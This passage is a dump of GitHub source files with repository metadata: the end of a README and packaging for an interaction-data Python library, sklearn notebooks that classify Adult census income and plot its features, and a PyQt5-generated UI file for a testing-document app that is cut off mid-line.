and aliases (short-hand names):\n\n```python\ninteraction_events = set([\"PLAY_PAUSE_BUTTON_CLICKED\", \"BACK_BUTTON_CLICKED\", ...])\naliases = dict({\"PLAY_PAUSE_BUTTON_CLICKED\": \"PP\", \"BACK_BUTTON_CLICKED\": \"BB\", ...})\n```\n\nThe way in which this extractor works is very similar to `Statistics` and there is a presumption that the events are in the same format as previously. \n\nTo extract the sequences (presumes you have already a loaded `user_events` object):\n\n```python\nfrom interlib.preprocessing.sequences import Sequences\n\nseq = Sequences(user_events) # set-up the Sequences object\nuser_sequences = seq.get_sequences(interaction_events, aliases)\nprint(user_sequences)\n```\n\n```json\n{\n \"<user_1>\": [\"NEC\", \"MP\", \"PP\", \"VLP\", \"NB\", \"NB\", \"NEC\", \"VLP\", ...],\n \"<user_2>\": [],\n \"<user_N>\": []\n}\n```\n\nIn some analysis cases, n-grams can prove a useful tool to represent sequences. As such, the library provides this option:\n\n```python\nn_grams = seq.get_ngrams(n = 3) # extract tri-grams\n```\n\n## Utility\n\nWhile the above deals with extracting data representations and features from the data, the ultilty package provides some common functions that may come in handy while working with this type of data. It is by no means exhaustive and it's essentially common functions that I have found useful when processing the data in the past. The main function in `util`, `to_dict`, has already been covered.\n\n```python\nfrom interlib.util import parse_raw_data, parse_timestamp, to_dataframe\n```\n\n**Parsing Raw Data**\nIf you have a list of raw events, then you're able to parse these into a format that is recognisable by the library:\n\n```python\nparsed_events = parse_raw_data(\n raw_data,\n datetime_format = \"%Y-%m-%d %H:%M:%S.%f\",\n include_narrative_element_id = False\n)\n```\n\n**Parsing timestamps**\nWhen handling the raw data, a common task was to parse the timestamps into `datetime` objects from strings. This function, given a list of events in their raw format and with a `timestamp` element, parses the timestamps into `datetime` objects:\n\n```python\nparsed_events = parse_timestamp(\n raw_data,\n datetime_format = \"%Y-%m-%d %H:%M:%S.%f\"\n)\n```\n\n**To DataFrame**\nTo start analysing the data, I recommend using pandas. To help, there is a utility function that can convert the output from the `Statistics` object into a usable dataframe. \n\n```python\ndf = to_dataframe(user_statistics)\n```\n\n## Reference\n\nPublish: TODO :)\n" }, { "alpha_fraction": 0.6824034452438354, "alphanum_fraction": 0.6866952776908875, "avg_line_length": 22.350000381469727, "blob_id": "50936de25c17af9a6e5eca58db66b3ec110ec43b", "content_id": "7e06e8ecb3a6780eba92ff6ecd258c8536e61b98", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 466, "license_type": "no_license", "max_line_length": 57, "num_lines": 20, "path": "/setup.py", "repo_name": "JonoCX/interaction-lib", "src_encoding": "UTF-8", "text": "from distutils.core import setup\n\nname = 'interlib'\nversion = 0.1\ndescription = 'A library for processing interaction data'\nurl = 'https://github.com/JonoCX/interaction-lib'\nauthor = 'Jonathan Carlton'\nauthor_email = '[email protected]'\nlong_description = description\n\nsetup(\n name = name,\n version = version,\n description = description,\n url = url,\n author = author,\n author_email = author_email,\n long_description = long_description,\n packages = ['interlib']\n)" }, { "alpha_fraction": 0.7638888955116272, "alphanum_fraction": 0.7638888955116272, "avg_line_length": 23.33333396911621, "blob_id": "ea51fe77d0d3a8d23a4dd769001d1b1bc00419eb", "content_id": "5a8a958cae0bd5b08f0357145df9922ca1298dd9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 72, "license_type": "no_license", "max_line_length": 25, "num_lines": 3, "path": "/interlib/preprocessing/__init__.py", "repo_name": "JonoCX/interaction-lib", "src_encoding": "UTF-8", "text": "from .sequences import *\nfrom .statistics import *\nfrom .slices import *" } ]
17
superg2009/comp3710AIProject
https://github.com/superg2009/comp3710AIProject
1635bb5161fe2dc97a5b38aa1c0b1523dc72b47a
2314e6ca154e21c9bdc881e260e6259e0af1966a
7809620ed0d7d25abffdb652f31d5a7f6b5bb443
refs/heads/master
2021-01-03T04:40:49.774429
2020-02-12T04:31:59
2020-02-12T04:31:59
239,926,859
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6704514622688293, "alphanum_fraction": 0.6882941126823425, "avg_line_length": 21.149700164794922, "blob_id": "ef1ad8f0be9679ad6766f3332583103ce463c521", "content_id": "c1837c18ef870809703091dd8fe985b233908204", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3699, "license_type": "no_license", "max_line_length": 151, "num_lines": 167, "path": "/AIClassification.py", "repo_name": "superg2009/comp3710AIProject", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport matplotlib.pyplot as plt # graphing lib\nimport numpy as np # linear alg.\nimport pandas as pd # data manipulation\nimport seaborn as sns # nicer matplot graphs\n#get_ipython().run_line_magic('matplotlib', 'inline # inline graphs are nice to have')\n\n\n# In[2]:\n\n\n# name columns\nname_headers = ['age','workclass','fnlwgt','education','education_num',\n 'marital_status','occupation',\n 'relationship','race','sex','capital_gain',\n 'capital_loss','hours_per_week','native_country','income']\n# read data in\ndf=pd.read_csv('adult.csv',names=name_headers)\n\n\n# In[3]:\n\n\ndf = df.fillna(np.nan)\ndf = df.applymap(lambda x: np.nan if x=='?' else x)\nsns.set(color_codes=True)\n\n\n# In[4]:\n\n\ndf.columns\n\n\n# In[5]:\n\n\n#looking at age distribution\ndf['age'].value_counts()\nsns.distplot(df['age'],bins=8, kde=False)\n\n\n# In[6]:\n\n\n# see race dist, primarily white\ndf['race'].value_counts()\nsns.countplot(df['race'])\n\n\n# In[7]:\n\n\n# primarily private sector\ndf['workclass'].value_counts()\ncount = sns.countplot(df['workclass'])\n# set x axis size later\n\n\n# In[8]:\n\n\nfrom sklearn.model_selection import train_test_split,cross_val_score\n\n\n# In[9]:\n\n\n# map that we want to predict to a binary set of ints (0,1)\ndf['income_norm']=df['income'].map({'<=50K': 0, '>50K': 1, '<=50K.': 0, '>50K.': 1})\n#Numeric features\nnumeric_features = ['age','fnlwgt','education_num','capital_gain','capital_loss','hours_per_week','income_norm']\n#Categorical features\ncat_features = ['workclass','education','marital_status', 'occupation', 'relationship', 'race', 'sex', 'native']\n\n\n# In[10]:\n\n\nsns.countplot(df['income_norm'])\n# we see a large disparity in the data between # of entries\n\n\n# In[11]:\n\n\n# correlation matrix of features\nsns.heatmap(df[numeric_features].corr(), fmt='.2f',cmap='Accent',annot=True)\n\n\n# In[12]:\n\n\n# data cleaning\ndf['workclass'] = df['workclass'].fillna('X')\ndf['occupation'] = df['occupation'].fillna('X')\ndf['native_country'] = df['native_country'].fillna('United-States')\n#check to be sure we have no na\ndf.isnull().sum()\n\n\n# In[13]:\n\n\n#Feature engineering\ndf['sex'] = df['sex'].map({\"Male\":0,\"Female\":1})\n#df['sex'] = df['sex'].astype(int) # set column as type int\ndf.drop(labels=['education','occupation','workclass','fnlwgt','relationship','native_country','income','race','marital_status'], axis=1, inplace=True) \n# income is dropped as incorm_norm is used ^\n\n\n# In[14]:\n\n\ndf = df.dropna()\ny = df['income_norm'].values\nx = df.drop(labels=['income_norm'] ,axis=1) # income is the target\n#df.isnull().sum()\n# data splitting\nX_train,X_test, Y_train, Y_test = train_test_split(x,y,test_size=0.2,train_size=0.8,random_state = 42)\n\n\n# In[27]:\n\n\n# sklearn imports\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.svm import SVC\n\n\n# In[17]:\n\n\nclassifiers = []\nclassifiers.append(LogisticRegression(solver='lbfgs'))\nclassifiers.append(KNeighborsClassifier())\nclassifiers.append(DecisionTreeClassifier())\nclassifiers.append(GaussianNB())\nclassifiers.append(RandomForestClassifier(n_estimators=100,max_features=3))\nclassifiers.append(SVC())\n\n\n# In[18]:\n\n\nX_train.head()\n\n\n# In[19]:\n\n\nresults=[]\nfor clf in classifiers:\n cross_val = cross_val_score(clf,X_train,Y_train,scoring='accuracy',cv=5,n_jobs=-1)\n results.append(cross_val)\n #print(\"Mean: \",cross_val.mean(),\"Standard Dev: \",cross_val.std()*2)\n print(\"Accuracy: %0.2f (+/- %0.2f)\" % (cross_val.mean(), cross_val.std() * 2))\n" }, { "alpha_fraction": 0.7526881694793701, "alphanum_fraction": 0.7956989407539368, "avg_line_length": 30.33333396911621, "blob_id": "aba7d9a85b16c783694c0fbf8e0557e2b3ea6416", "content_id": "b9483f46770940e4e055a615cf5a415c324f107b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 93, "license_type": "no_license", "max_line_length": 69, "num_lines": 3, "path": "/readme.txt", "repo_name": "superg2009/comp3710AIProject", "src_encoding": "UTF-8", "text": "requires scikit 0.19.2\n\nno guarentee that the .py file work I wrote this project with jupyter" }, { "alpha_fraction": 0.6339198350906372, "alphanum_fraction": 0.6593353152275085, "avg_line_length": 17.907407760620117, "blob_id": "f0c059ca686aebdfbbe6774084a7514790aee404", "content_id": "1a34d67b73843d930812fad0285da86a1fe975a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2046, "license_type": "no_license", "max_line_length": 120, "num_lines": 108, "path": "/Graphing.py", "repo_name": "superg2009/comp3710AIProject", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[34]:\n\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n#get_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# In[46]:\n\n\n# name columns\nname_headers = ['age','workclass','fnlwgt','education','education_num',\n 'marital_status','occupation',\n 'relationship','race','sex','capital_gain',\n 'capital_loss','hours_per_week','native_country','income']\n# read data in\ndf=pd.read_csv(r'adult.csv',names=name_headers)\n\n\n# In[47]:\n\n\ndf = df.fillna(np.nan)\ndf = df.applymap(lambda x: np.nan if x=='?' else x)\nsns.set(color_codes=True)\n\n\n# In[48]:\n\n\n# map that we want to predict to a binary set of ints (0,1)\ndf['income_norm']=df['income'].map({'<=50K': 0, '>50K': 1, '<=50K.': 0, '>50K.': 1})\n#Numeric features\nnumeric_features = ['age','fnlwgt','education_num','capital_gain','capital_loss','hours_per_week','income_norm']\n#Categorical features\ncat_features = ['workclass','education','marital_status', 'occupation', 'relationship', 'race', 'sex', 'native_country']\n\n\n# In[49]:\n\n\nsns.countplot(df['sex'])\n\n\n# In[39]:\n\n\n#Feature engineering\ndf['sex'] = df['sex'].map({\"Male\":0,\"Female\":1})\n#df['sex'] = df['sex'].astype(int) # set column as type int\ndf = df.dropna()\n\n\n# In[40]:\n\n\n# correlation matrix of features\nsns.heatmap(df[numeric_features].corr(), fmt='.2f',cmap='Accent',annot=True)\n# low correlation outside of age,hours,capital gain,income\n\n\n# In[41]:\n\n\n# primarily private sector\ndf['workclass'].value_counts()\ncount = sns.countplot(df['workclass'])\n\n\n# In[42]:\n\n\n# see race dist, primarily white\ndf['race'].value_counts()\nsns.countplot(df['race'])\n\n\n# In[43]:\n\n\n#looking at age distribution\n#primarily middle age majority 20-50s\ndf['age'].value_counts()\nsns.distplot(df['age'],bins=8, kde=False)\n\n\n# In[44]:\n\n\nplt.figure(figsize=(10,5))\nchart = sns.countplot(df['marital_status'])\nchart.set_xticklabels(chart.get_xticklabels(),rotation=45)\n\n\n# In[45]:\n\n\nsns.distplot(df['sex'], kde=False)\n#sns.despine(bottom=True)\n\n\n# In[ ]:\n\n\n\n\n" } ]
3
rjgpacheco/multi-threshold-optimization
https://github.com/rjgpacheco/multi-threshold-optimization
4039b7456182b6a7457a19d28db089fd25bf8946
328ce1eec814cd1631bd37000b76c087b2bfc1f7
2ea4ae0d3d6358c72394d08b289831f6b59540bd
refs/heads/master
2020-05-30T16:05:14.934887
2019-07-05T00:14:50
2019-07-05T00:14:50
189,838,476
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.43815916776657104, "alphanum_fraction": 0.4688398838043213, "avg_line_length": 20.70833396911621, "blob_id": "ba7ead5bad690ca89bc6f8d59bff4e531a5ab883", "content_id": "a7e5809cb2bb17be79239006a0a7d47b906a7766", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1043, "license_type": "no_license", "max_line_length": 80, "num_lines": 48, "path": "/my_optimizer.py", "repo_name": "rjgpacheco/multi-threshold-optimization", "src_encoding": "UTF-8", "text": "\n\ndef calc_df(f, u, step=float(1e-6)):\n d = []\n for i, _ in enumerate(u):\n v = [x for x in u]\n v[i] = v[i] + step\n derivative = f(v) - f(u)\n derivative = derivative / step\n d.append(derivative) \n return d\n \n \n\ndef calc_diff(u,v):\n if len(u) == 1:\n return abs(u-v)\n acc = 0\n for x in zip(u,v):\n acc = acc + (x[1] - x[0])**2\n return acc ** (1/2)\n\n\ndef find_minimum(f, x0, learning_rate=0.1, max_iterations=10000, tol=1e-6):\n import math\n x = []\n df = []\n\n x.append(x0)\n df.append(math.inf)\n loop_counter = 0\n diff = math.inf\n while diff > tol:\n loop_counter = loop_counter + 1\n if loop_counter > 10000:\n break\n\n new_df = calc_df(f, x[-1])\n new_x = [x[-1][i] - learning_rate*new_df[i] for i in range(len(x[-1]))]\n\n df.append(new_df)\n x.append(new_x)\n\n diff = calc_diff(x[-2], x[-1])\n \n return {\n \"x\": x,\n \"df\": df,\n \"loop_counter\": loop_counter\n }" } ]
1
concordia-fsae/testing_doc_maker
https://github.com/concordia-fsae/testing_doc_maker
53962d71ee785e69831dc525eaf40a6b2997c1b3
578d8738acbbfd35d2f54f35ddbdc8804ebc4259
380a11d24329a23379918ff83dd57066b3dd5217
refs/heads/master
2022-01-24T21:19:55.236836
2019-08-16T00:16:12
2019-08-16T00:16:12
198,271,644
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7130706906318665, "alphanum_fraction": 0.723076581954956, "avg_line_length": 63.658226013183594, "blob_id": "3a94968341041aabbff420e126dbfecb3b4f8678", "content_id": "646c12584ce8450c82a39484bf4a866816b559fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 45973, "license_type": "no_license", "max_line_length": 122, "num_lines": 711, "path": "/windows/homepage.py", "repo_name": "concordia-fsae/testing_doc_maker", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file '.\\homepage_export.ui'\n#\n# Created by: PyQt5 UI code generator 5.11.3\n#\n# WARNING! All changes made in this file will be lost!\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(690, 716)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.MinimumExpanding, QtWidgets.QSizePolicy.MinimumExpanding)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(MainWindow.sizePolicy().hasHeightForWidth())\n MainWindow.setSizePolicy(sizePolicy)\n MainWindow.setMinimumSize(QtCore.QSize(647, 716))\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)\n self.gridLayout.setObjectName(\"gridLayout\")\n self.main_tabs = QtWidgets.QTabWidget(self.centralwidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.main_tabs.sizePolicy().hasHeightForWidth())\n self.main_tabs.setSizePolicy(sizePolicy)\n self.main_tabs.setMinimumSize(QtCore.QSize(0, 500))\n self.main_tabs.setTabShape(QtWidgets.QTabWidget.Rounded)\n self.main_tabs.setDocumentMode(False)\n self.main_tabs.setObjectName(\"main_tabs\")\n self.tab_main = QtWidgets.QWidget()\n self.tab_main.setObjectName(\"tab_main\")\n self.gridlayout = QtWidgets.QGridLayout(self.tab_main)\n self.gridlayout.setObjectName(\"gridlayout\")\n self.scroll_fields = QtWidgets.QScrollArea(self.tab_main)\n self.scroll_fields.setWidgetResizable(True)\n self.scroll_fields.setObjectName(\"scroll_fields\")\n self.scroll_fields_contents = QtWidgets.QWidget()\n self.scroll_fields_contents.setGeometry(QtCore.QRect(0, 0, 646, 551))\n self.scroll_fields_contents.setObjectName(\"scroll_fields_contents\")\n self.gridLayout_3 = QtWidgets.QGridLayout(self.scroll_fields_contents)\n self.gridLayout_3.setObjectName(\"gridLayout_3\")\n spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\n self.gridLayout_3.addItem(spacerItem, 4, 0, 1, 1)\n spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.gridLayout_3.addItem(spacerItem1, 3, 1, 1, 1)\n self.label_general = QtWidgets.QLabel(self.scroll_fields_contents)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.label_general.sizePolicy().hasHeightForWidth())\n self.label_general.setSizePolicy(sizePolicy)\n font = QtGui.QFont()\n font.setPointSize(14)\n font.setBold(True)\n font.setWeight(75)\n self.label_general.setFont(font)\n self.label_general.setObjectName(\"label_general\")\n self.gridLayout_3.addWidget(self.label_general, 0, 0, 1, 1)\n self.fr_general_info = QtWidgets.QFrame(self.scroll_fields_contents)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.fr_general_info.sizePolicy().hasHeightForWidth())\n self.fr_general_info.setSizePolicy(sizePolicy)\n self.fr_general_info.setFrameShape(QtWidgets.QFrame.Box)\n self.fr_general_info.setFrameShadow(QtWidgets.QFrame.Raised)\n self.fr_general_info.setLineWidth(1)\n self.fr_general_info.setObjectName(\"fr_general_info\")\n self.horizontalLayout_3 = QtWidgets.QHBoxLayout(self.fr_general_info)\n self.horizontalLayout_3.setObjectName(\"horizontalLayout_3\")\n self.form_left_general = QtWidgets.QFormLayout()\n self.form_left_general.setContentsMargins(-1, 5, -1, -1)\n self.form_left_general.setObjectName(\"form_left_general\")\n self.label_requestor = QtWidgets.QLabel(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.label_requestor.sizePolicy().hasHeightForWidth())\n self.label_requestor.setSizePolicy(sizePolicy)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_requestor.setFont(font)\n self.label_requestor.setObjectName(\"label_requestor\")\n self.form_left_general.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.label_requestor)\n self.edit_requestor = QtWidgets.QLineEdit(self.fr_general_info)\n self.edit_requestor.setEnabled(True)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.edit_requestor.sizePolicy().hasHeightForWidth())\n self.edit_requestor.setSizePolicy(sizePolicy)\n self.edit_requestor.setMaximumSize(QtCore.QSize(135, 16777215))\n self.edit_requestor.setFocusPolicy(QtCore.Qt.StrongFocus)\n self.edit_requestor.setContextMenuPolicy(QtCore.Qt.DefaultContextMenu)\n self.edit_requestor.setAutoFillBackground(True)\n self.edit_requestor.setStyleSheet(\"\")\n self.edit_requestor.setInputMask(\"\")\n self.edit_requestor.setText(\"\")\n self.edit_requestor.setDragEnabled(False)\n self.edit_requestor.setClearButtonEnabled(True)\n self.edit_requestor.setObjectName(\"edit_requestor\")\n self.form_left_general.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.edit_requestor)\n self.label_lead = QtWidgets.QLabel(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.label_lead.sizePolicy().hasHeightForWidth())\n self.label_lead.setSizePolicy(sizePolicy)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_lead.setFont(font)\n self.label_lead.setObjectName(\"label_lead\")\n self.form_left_general.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.label_lead)\n self.edit_lead = QtWidgets.QLineEdit(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.edit_lead.sizePolicy().hasHeightForWidth())\n self.edit_lead.setSizePolicy(sizePolicy)\n self.edit_lead.setMaximumSize(QtCore.QSize(135, 16777215))\n self.edit_lead.setClearButtonEnabled(True)\n self.edit_lead.setObjectName(\"edit_lead\")\n self.form_left_general.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.edit_lead)\n self.label_attendee = QtWidgets.QLabel(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.label_attendee.sizePolicy().hasHeightForWidth())\n self.label_attendee.setSizePolicy(sizePolicy)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_attendee.setFont(font)\n self.label_attendee.setObjectName(\"label_attendee\")\n self.form_left_general.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.label_attendee)\n self.btn_modify_attending = QtWidgets.QPushButton(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_modify_attending.sizePolicy().hasHeightForWidth())\n self.btn_modify_attending.setSizePolicy(sizePolicy)\n self.btn_modify_attending.setObjectName(\"btn_modify_attending\")\n self.form_left_general.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.btn_modify_attending)\n self.label_session_date = QtWidgets.QLabel(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.label_session_date.sizePolicy().hasHeightForWidth())\n self.label_session_date.setSizePolicy(sizePolicy)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_session_date.setFont(font)\n self.label_session_date.setObjectName(\"label_session_date\")\n self.form_left_general.setWidget(3, QtWidgets.QFormLayout.LabelRole, self.label_session_date)\n self.label_session_st = QtWidgets.QLabel(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.label_session_st.sizePolicy().hasHeightForWidth())\n self.label_session_st.setSizePolicy(sizePolicy)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_session_st.setFont(font)\n self.label_session_st.setObjectName(\"label_session_st\")\n self.form_left_general.setWidget(4, QtWidgets.QFormLayout.LabelRole, self.label_session_st)\n self.time_start = QtWidgets.QTimeEdit(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.time_start.sizePolicy().hasHeightForWidth())\n self.time_start.setSizePolicy(sizePolicy)\n self.time_start.setMaximumSize(QtCore.QSize(70, 16777215))\n self.time_start.setObjectName(\"time_start\")\n self.form_left_general.setWidget(4, QtWidgets.QFormLayout.FieldRole, self.time_start)\n self.label_session_et = QtWidgets.QLabel(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.label_session_et.sizePolicy().hasHeightForWidth())\n self.label_session_et.setSizePolicy(sizePolicy)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_session_et.setFont(font)\n self.label_session_et.setObjectName(\"label_session_et\")\n self.form_left_general.setWidget(5, QtWidgets.QFormLayout.LabelRole, self.label_session_et)\n self.time_end = QtWidgets.QTimeEdit(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.time_end.sizePolicy().hasHeightForWidth())\n self.time_end.setSizePolicy(sizePolicy)\n self.time_end.setMaximumSize(QtCore.QSize(70, 16777215))\n self.time_end.setTime(QtCore.QTime(1, 0, 0))\n self.time_end.setObjectName(\"time_end\")\n self.form_left_general.setWidget(5, QtWidgets.QFormLayout.FieldRole, self.time_end)\n self.label_testing_type = QtWidgets.QLabel(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.label_testing_type.sizePolicy().hasHeightForWidth())\n self.label_testing_type.setSizePolicy(sizePolicy)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_testing_type.setFont(font)\n self.label_testing_type.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop)\n self.label_testing_type.setObjectName(\"label_testing_type\")\n self.form_left_general.setWidget(6, QtWidgets.QFormLayout.LabelRole, self.label_testing_type)\n self.layout_type = QtWidgets.QVBoxLayout()\n self.layout_type.setObjectName(\"layout_type\")\n self.radio_dyno = QtWidgets.QRadioButton(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.radio_dyno.sizePolicy().hasHeightForWidth())\n self.radio_dyno.setSizePolicy(sizePolicy)\n self.radio_dyno.setObjectName(\"radio_dyno\")\n self.radio_type = QtWidgets.QButtonGroup(MainWindow)\n self.radio_type.setObjectName(\"radio_type\")\n self.radio_type.addButton(self.radio_dyno)\n self.layout_type.addWidget(self.radio_dyno)\n self.radio_track = QtWidgets.QRadioButton(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.radio_track.sizePolicy().hasHeightForWidth())\n self.radio_track.setSizePolicy(sizePolicy)\n self.radio_track.setObjectName(\"radio_track\")\n self.radio_type.addButton(self.radio_track)\n self.layout_type.addWidget(self.radio_track)\n self.layout_type_other = QtWidgets.QHBoxLayout()\n self.layout_type_other.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)\n self.layout_type_other.setObjectName(\"layout_type_other\")\n self.radio_type_other = QtWidgets.QRadioButton(self.fr_general_info)\n self.radio_type_other.setText(\"\")\n self.radio_type_other.setChecked(False)\n self.radio_type_other.setAutoExclusive(True)\n self.radio_type_other.setObjectName(\"radio_type_other\")\n self.radio_type.addButton(self.radio_type_other)\n self.layout_type_other.addWidget(self.radio_type_other)\n self.edit_type_other = QtWidgets.QLineEdit(self.fr_general_info)\n self.edit_type_other.setEnabled(False)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.edit_type_other.sizePolicy().hasHeightForWidth())\n self.edit_type_other.setSizePolicy(sizePolicy)\n self.edit_type_other.setMaximumSize(QtCore.QSize(135, 16777215))\n self.edit_type_other.setStyleSheet(\"\")\n self.edit_type_other.setText(\"\")\n self.edit_type_other.setReadOnly(False)\n self.edit_type_other.setClearButtonEnabled(True)\n self.edit_type_other.setObjectName(\"edit_type_other\")\n self.layout_type_other.addWidget(self.edit_type_other)\n self.layout_type.addLayout(self.layout_type_other)\n self.form_left_general.setLayout(6, QtWidgets.QFormLayout.FieldRole, self.layout_type)\n self.label_session_loc = QtWidgets.QLabel(self.fr_general_info)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.label_session_loc.sizePolicy().hasHeightForWidth())\n 